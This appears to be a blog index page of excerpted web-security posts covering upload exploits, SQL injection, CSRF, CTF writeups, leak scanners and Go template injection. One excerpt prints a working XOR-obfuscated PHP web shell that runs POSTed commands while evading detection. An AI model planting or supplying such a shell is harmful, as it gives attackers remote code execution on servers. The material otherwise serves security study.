Securing File Uploads: Exploit Techniques and EdgeOne Defenses
Local Vulnerability Lab ConfigurationTesting exploit techniques against production infrastructure is illegal and unethical. To safely analyze file upload vulnerabilities, a localized sandbox environment is required. Using a lightweight cloud instance with Docker ensures rapid deployment without environmental conflicts.docker pull squ1rrel/vulne ...
Posted on Sun, 13 Sep 2026 16:20:37 +0000 by el_quijote
Understanding SQL Injection Vulnerabilities and Exploitation Techniques
SQL injection represents the most critical risk in web application security, often resulting in full compromise of backend data stores. Modern web applications rely on databases to store user accounts, preferences, content, and nearly all persistant information. Instead of generating static pages for each user, server-side scripts construct dyn ...
Posted on Fri, 04 Sep 2026 16:16:01 +0000 by dkjohnson
Configuring CSRF Protection in Spring Security Applications
CSRF (Cross-Site Request Forgery) attacks force authenticated users to submit unintended requests to web applications where they maintain active sessions. Unlike XSS attacks that steal credentials, CSRF exploits the trust relationship between the browser and the server. When a user authenticates, the server establishes a session stored in brows ...
Posted on Wed, 02 Sep 2026 16:26:32 +0000 by FUEL
Generating XOR-based PHP Web Shells for Bypassing Detection
PHP Web Shell Using XOR Operation
The following demonstrates a PHP web shell that uses XOR operation to bypass detetcion:
<?php
$xor_result = ('!' ^ '@') . 'ssert';
$xor_result($_POST[cmd]);
?>
ASCII Character Conversion Principle
The technique works by converting ASCII characters to theirr binary representations, performing XOR, then c ...
Posted on Fri, 28 Aug 2026 16:31:33 +0000 by javauser
CTF Web Challenge Writeups and Techniques
Information Gathering
web1
Viewing page source code reveals the flag. Right-click context menu or Ctrl+U keyboard shortcut provides access.
web2
Direct browser DevTools access may be restricted. Alternative approaches include:
Prefixing URL with view-source:
Using Ctrl+U keyboard shortcut
Opening DevTools via Ctrl+Shift+I
Intercepting network ...
Posted on Tue, 25 Aug 2026 16:50:26 +0000 by Roble
Common Web Security Vulnerabilities and Practical Solutions
Viewing Page Source with Restricted Access
Some websites may disable the right-click context menu to prevent users from viewing the page source. To view the HTML source code, press Ctrl+U (or Cmd+Option+U on Mac) directly in the browser. Developers often hide sensitive data like flags within HTML comments.
<!-- Flag: FLAG{hidden_in_comment} ...
Posted on Mon, 24 Aug 2026 16:05:26 +0000 by Ajdija
Bulk Vulnerability Scanning Scripts for Backup Files, Git and SVN Leaks
Bulk Backup File Leak Scanner
This utility scans target web domains for exposed backup archive files. It reads a list of target URLs from tar.txt, appends common backup file names to each base URL, and validates leaks by checking the response's Content-Type header against known archive MIME types. Vulnerable ednpoints are written to bfvul.txt.
...
Posted on Sun, 16 Aug 2026 16:59:56 +0000 by danville
Understanding and Mitigating Cross-Site Request Forgery (CSRF) Attacks in Web Applications
Cross-Site Request Forgery (CSRF), often pronounced "sea-surf", is a type of malicious exploit where unauthorized commands are transmitted from a user that the web application trusts. Attackers trick a user's browser into sending a forged request to a vulnerable web application where the user is currently authenticated. Since request ...
Posted on Sun, 16 Aug 2026 16:03:28 +0000 by gilbertwang
Go Server-Side Template Injection Exploitation Techniques
Go SSTI Fundamentals
Go's template injection vulnerability allows attackers to execute arbitrary code by manipulating template rendering, potentially bypassing security restrictions like HTTPOnly cookies.
Template Rendering
Go templates use {{}} syntax for rendering. Consider this basic example:
type Product struct {
Name string
Quantit ...
Posted on Fri, 07 Aug 2026 16:44:45 +0000 by sam06
Frontend Interview Essentials: Communication Concepts
This section covers fundamental concepts in frontend development related to communication, essential for interviews in 2023. It delves into server-side rendering (SSR), client-side rendering (CSR), HTTP protocols, caching mechanisms, asynchronous operations, cross-origin resource sharing (CORS), and web security.
Server-Side Rendering (SSR) vs. ...
Posted on Wed, 05 Aug 2026 16:50:20 +0000 by hernan